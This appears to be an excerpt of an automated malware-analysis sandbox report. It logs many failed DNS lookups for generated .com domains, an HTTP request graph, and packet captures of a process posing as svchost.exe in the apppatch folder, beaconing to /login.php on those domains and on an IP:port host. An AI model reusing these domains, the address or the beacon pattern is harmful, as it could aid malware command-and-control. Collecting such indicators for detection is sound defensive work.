                                                                                                                                                                                                            Sep 8, 2024 09:00:33.757437944 CEST1.1.1.1192.168.2.40xead9Name error (3)gadydow.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.759149075 CEST1.1.1.1192.168.2.40x9556Name error (3)lyvylyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.761838913 CEST1.1.1.1192.168.2.40xa9f8Name error (3)puvylep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.767554998 CEST1.1.1.1192.168.2.40xf44cName error (3)pufybyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.768774033 CEST1.1.1.1192.168.2.40x992cName error (3)pujymiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.769752979 CEST1.1.1.1192.168.2.40xa841Name error (3)qetysog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.770304918 CEST1.1.1.1192.168.2.40x5f07Name error (3)qegynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.771945000 CEST1.1.1.1192.168.2.40xae8cName error (3)vojymuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775806904 CEST1.1.1.1192.168.2.40xb166Name error (3)lyryson.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775818110 CEST1.1.1.1192.168.2.40x2ac5Name error (3)gahynuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.776604891 CEST1.1.1.1192.168.2.40xdbf9Name error (3)lygynyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.783773899 CEST1.1.1.1192.168.2.40xbfadName error (3)purypig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.784715891 CEST1.1.1.1192.168.2.40xd2eName error (3)qekyhug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.785196066 CEST1.1.1.1192.168.2.40x7d81Name error (3)qexykav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.785360098 CEST1.1.1.1192.168.2.40xd60dName error (3)vowypim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.785525084 CEST1.1.1.1192.168.2.40x77cbName error (3)gacykas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.787949085 CEST1.1.1.1192.168.2.40xb0c0Name error (3)vofybet.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.787959099 CEST1.1.1.1192.168.2.40x7aa3Name error (3)gaqypuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.790687084 CEST1.1.1.1192.168.2.40x523eName error (3)qeqytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.792280912 CEST1.1.1.1192.168.2.40xd44eName error (3)qedyvap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.793040991 CEST1.1.1.1192.168.2.40xf6c6Name error (3)volyjif.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.794044971 CEST1.1.1.1192.168.2.40xf036Name error (3)pumytyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.794132948 CEST1.1.1.1192.168.2.40xa6b4Name error (3)lyxyjod.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.796139002 CEST1.1.1.1192.168.2.40x758dName error (3)lymytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.797219992 CEST1.1.1.1192.168.2.40xa069Name error (3)lysyvax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.799263954 CEST1.1.1.1192.168.2.40x8514Name error (3)lyvywar.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.799690008 CEST1.1.1.1192.168.2.40x895Name error (3)gadyvez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.799758911 CEST1.1.1.1192.168.2.40x2f01Name error (3)puzyjov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.801455975 CEST1.1.1.1192.168.2.40xdfc4Name error (3)pupycop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.802409887 CEST1.1.1.1192.168.2.40x452dName error (3)vonyryk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.840253115 CEST1.1.1.1192.168.2.40x2c0bName error (3)gaqyzyb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.842442989 CEST1.1.1.1192.168.2.40xa4a7Name error (3)lygyfej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.847392082 CEST1.1.1.1192.168.2.40x211bName error (3)puvywal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.847418070 CEST1.1.1.1192.168.2.40xde42Name error (3)qexyqip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.860507011 CEST1.1.1.1192.168.2.40x47Name error (3)galyhib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.942596912 CEST1.1.1.1192.168.2.40x4e9cName error (3)puzymup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.066040993 CEST1.1.1.1192.168.2.40x3c1fName error (3)qeqylyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.349431992 CEST1.1.1.1192.168.2.40xfde6Name error (3)vowykat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.353049040 CEST1.1.1.1192.168.2.40xd090Name error (3)pufypuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.356031895 CEST1.1.1.1192.168.2.40x8addName error (3)qexynyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.361721992 CEST1.1.1.1192.168.2.40x9161Name error (3)gahydos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.370935917 CEST1.1.1.1192.168.2.40x4196Name error (3)puvymug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.371103048 CEST1.1.1.1192.168.2.40x5238Name error (3)lyvymun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.374803066 CEST1.1.1.1192.168.2.40x7b29Name error (3)qetylel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.377490044 CEST1.1.1.1192.168.2.40x3acbName error (3)lygysid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.398865938 CEST1.1.1.1192.168.2.40x693eName error (3)vojydoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.398926973 CEST1.1.1.1192.168.2.40xca60Name error (3)purylal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.402306080 CEST1.1.1.1192.168.2.40x8064Name error (3)vocymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.403820038 CEST1.1.1.1192.168.2.40x645eName error (3)lyryler.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.410487890 CEST1.1.1.1192.168.2.40xb470Name error (3)gacynyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.416316032 CEST1.1.1.1192.168.2.40xfc04Name error (3)vojybef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.417681932 CEST1.1.1.1192.168.2.40x7e15Name error (3)pufycog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.417809963 CEST1.1.1.1192.168.2.40x68d7Name error (3)gatypuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.424194098 CEST1.1.1.1192.168.2.40x3476Name error (3)vopyput.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.424365044 CEST1.1.1.1192.168.2.40x29fcName error (3)ganykah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.424696922 CEST1.1.1.1192.168.2.40x5897Name error (3)pujybev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.424710989 CEST1.1.1.1192.168.2.40xd4c2Name error (3)lykynyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.426670074 CEST1.1.1.1192.168.2.40x53abName error (3)qekynyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.426745892 CEST1.1.1.1192.168.2.40x562cName error (3)vonykam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.432466030 CEST1.1.1.1192.168.2.40x6638Name error (3)lyvyjoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.436767101 CEST1.1.1.1192.168.2.40x4d12Name error (3)lymylen.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.452013016 CEST1.1.1.1192.168.2.40x7f84Name error (3)qegyvag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.455921888 CEST1.1.1.1192.168.2.40xb54aName error (3)pumyleg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.456393003 CEST1.1.1.1192.168.2.40xe23fName error (3)volymuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.456901073 CEST1.1.1.1192.168.2.40xf17dName error (3)qebykoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.457082987 CEST1.1.1.1192.168.2.40xdb53Name error (3)qedysol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.457567930 CEST1.1.1.1192.168.2.40x6ae9Name error (3)pupypil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.459867001 CEST1.1.1.1192.168.2.40xee44Name error (3)gacyhuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.464788914 CEST1.1.1.1192.168.2.40x20a0Name error (3)lygyvon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.465265036 CEST1.1.1.1192.168.2.40xafa7Name error (3)vowyrec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.465912104 CEST1.1.1.1192.168.2.40x322aName error (3)puvyjiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.467928886 CEST1.1.1.1192.168.2.40x4014Name error (3)qexyhul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.468847036 CEST1.1.1.1192.168.2.40xa207Name error (3)lyxygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.469538927 CEST1.1.1.1192.168.2.40x3549Name error (3)ganyqib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.470634937 CEST1.1.1.1192.168.2.40x3aa6Name error (3)vofycim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.471436024 CEST1.1.1.1192.168.2.40x7966Name error (3)galynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.473786116 CEST1.1.1.1192.168.2.40xa08fName error (3)lyrytyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.473923922 CEST1.1.1.1192.168.2.40x62c3Name error (3)lysyxuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.474906921 CEST1.1.1.1192.168.2.40x1f2eName error (3)puzygyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.474916935 CEST1.1.1.1192.168.2.40xc68cName error (3)purytyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.475040913 CEST1.1.1.1192.168.2.40x53f1Name error (3)lymywad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.475909948 CEST1.1.1.1192.168.2.40x163fName error (3)vocyjik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.478537083 CEST1.1.1.1192.168.2.40x8606Name error (3)qedyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.479899883 CEST1.1.1.1192.168.2.40xc90cName error (3)gadycih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.484252930 CEST1.1.1.1192.168.2.40xc5fdName error (3)gaqyres.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.484702110 CEST1.1.1.1192.168.2.40x20aaName error (3)pumywov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.486756086 CEST1.1.1.1192.168.2.40xb967Name error (3)qeqyrav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.494328976 CEST1.1.1.1192.168.2.40x2276Name error (3)vopyzyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.500792027 CEST1.1.1.1192.168.2.40xd798Name error (3)qegysiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.501403093 CEST1.1.1.1192.168.2.40x6925Name error (3)lykyfax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.501418114 CEST1.1.1.1192.168.2.40x73a1Name error (3)volygyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.501692057 CEST1.1.1.1192.168.2.40xee60Name error (3)galyfez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.506617069 CEST1.1.1.1192.168.2.40x49b2Name error (3)gahyvab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.507334948 CEST1.1.1.1192.168.2.40x2cb4Name error (3)pupyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.508627892 CEST1.1.1.1192.168.2.40x3a87Name error (3)qebyqig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.522183895 CEST1.1.1.1192.168.2.40xa938Name error (3)qekyfep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.529809952 CEST1.1.1.1192.168.2.40x19b1Name error (3)gatyzyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.538800955 CEST1.1.1.1192.168.2.40xa380Name error (3)pujydap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.546567917 CEST1.1.1.1192.168.2.40x8a1bName error (3)vonyqof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.587255955 CEST1.1.1.1192.168.2.40x1b4cName error (3)qetytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.611340046 CEST1.1.1.1192.168.2.40xfa06Name error (3)lysysir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.859304905 CEST1.1.1.1192.168.2.40x7bb5Name error (3)vofypuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.859857082 CEST1.1.1.1192.168.2.40x3a93Name error (3)qeqykop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.861797094 CEST1.1.1.1192.168.2.40xc44bName error (3)lyxynej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.866132975 CEST1.1.1.1192.168.2.40xce3eName error (3)puzybeq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.878861904 CEST1.1.1.1192.168.2.40xbdc0Name error (3)gadypub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.894299030 CEST1.1.1.1192.168.2.40xac16Name error (3)vonyjuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.897550106 CEST1.1.1.1192.168.2.40x5ad1Name error (3)pumyjip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.917723894 CEST1.1.1.1192.168.2.40x6564Name error (3)lymyjix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.924139023 CEST1.1.1.1192.168.2.40x852aName error (3)pujycil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.941462994 CEST1.1.1.1192.168.2.40x22f3Name error (3)puzydog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.944808960 CEST1.1.1.1192.168.2.40x396dName error (3)gaqyqiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.944822073 CEST1.1.1.1192.168.2.40x16a6Name error (3)qexyfag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.946278095 CEST1.1.1.1192.168.2.40x105cName error (3)volybak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.946746111 CEST1.1.1.1192.168.2.40xd4f0Name error (3)lyxyfan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.949166059 CEST1.1.1.1192.168.2.40xb4e2Name error (3)qekyvol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.949628115 CEST1.1.1.1192.168.2.40x18c8Name error (3)lygyxux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.949856997 CEST1.1.1.1192.168.2.40xcb15Name error (3)lykyvor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.951356888 CEST1.1.1.1192.168.2.40xcf0aName error (3)qeqyqul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.952090025 CEST1.1.1.1192.168.2.40x9b53Name error (3)lyvygyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.956051111 CEST1.1.1.1192.168.2.40xe9e2Name error (3)vojycit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.960280895 CEST1.1.1.1192.168.2.40xb363Name error (3)gatyrah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.965563059 CEST1.1.1.1192.168.2.40xe8b6Name error (3)vofyzyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.969034910 CEST1.1.1.1192.168.2.40x8c29Name error (3)qebyhuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.970747948 CEST1.1.1.1192.168.2.40x9340Name error (3)gacyfeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.971060038 CEST1.1.1.1192.168.2.40x88eName error (3)vowyqik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.971616030 CEST1.1.1.1192.168.2.40xa8f7Name error (3)qetyraq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.975194931 CEST1.1.1.1192.168.2.40xde7Name error (3)pupyteg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.975478888 CEST1.1.1.1192.168.2.40x5f35Name error (3)lysytyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.976526022 CEST1.1.1.1192.168.2.40x6479Name error (3)lyrywoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.977266073 CEST1.1.1.1192.168.2.40x31a3Name error (3)purywoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.977782965 CEST1.1.1.1192.168.2.40xeab7Name error (3)galyvaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.979087114 CEST1.1.1.1192.168.2.40xeb77Name error (3)ganyhus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.983071089 CEST1.1.1.1192.168.2.40x777fName error (3)qegyxup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.994971037 CEST1.1.1.1192.168.2.40xc4deName error (3)pufyxyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.996356010 CEST1.1.1.1192.168.2.40x38cfName error (3)qedytyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.997294903 CEST1.1.1.1192.168.2.40x774eName error (3)vocygef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.997968912 CEST1.1.1.1192.168.2.40xcaaaName error (3)gahycuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:35.121479988 CEST1.1.1.1192.168.2.40x8457Name error (3)vopyrem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:35.128478050 CEST1.1.1.1192.168.2.40x7161Name error (3)puvygyv.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • www.google.comuser-agent:
                                                                                                                                                                                                              • qegyhig.com
                                                                                                                                                                                                              • lysyvan.com
                                                                                                                                                                                                              • lyvyxor.com
                                                                                                                                                                                                              • puzylyp.com
                                                                                                                                                                                                              • gahyqah.com
                                                                                                                                                                                                              • gatyfus.com
                                                                                                                                                                                                              • qetyfuv.com
                                                                                                                                                                                                              • vonypom.com
                                                                                                                                                                                                              • vocyzit.com
                                                                                                                                                                                                              • galyqaz.com
                                                                                                                                                                                                              • lymyxid.com
                                                                                                                                                                                                              • lysyfyj.com
                                                                                                                                                                                                              • gadyniw.com
                                                                                                                                                                                                              • vojyqem.com
                                                                                                                                                                                                              • ww1.lysyfyj.com
                                                                                                                                                                                                              • pupydeq.com
                                                                                                                                                                                                              • pupycag.com
                                                                                                                                                                                                              • lyrysor.com
                                                                                                                                                                                                              • 47.103.150.18:8001
                                                                                                                                                                                                              • galynuh.com
                                                                                                                                                                                                              • gadyciz.com
                                                                                                                                                                                                              • qexyhuv.com
                                                                                                                                                                                                              • vofycot.com
                                                                                                                                                                                                              • qegyval.com
                                                                                                                                                                                                              • lyxynyx.com
                                                                                                                                                                                                              • ww16.vofycot.com
                                                                                                                                                                                                              • ww25.lyxynyx.com
                                                                                                                                                                                                              • gatyhub.com
                                                                                                                                                                                                              • qetyhyg.com
                                                                                                                                                                                                              • lygyvuj.com
                                                                                                                                                                                                              • gahyhiz.com

                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.449732188.114.96.3807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.069648981 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.816704988 CEST791INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fo04kOXa0s8BvGPufwe1bQVFw4Z5mCTiSGfiOIPbUyGN6Zn8QaW4bGfyn6kII9ZgPbsVLnTxKftZilNV7NVGLkMbseDzCchk0F36fP%2ByxBPiOq%2FER%2Fh7sQRcMUqdEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0d4a49a9429a-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Sep 8, 2024 08:58:47.362576008 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Sep 8, 2024 08:58:47.720961094 CEST803INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:47 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
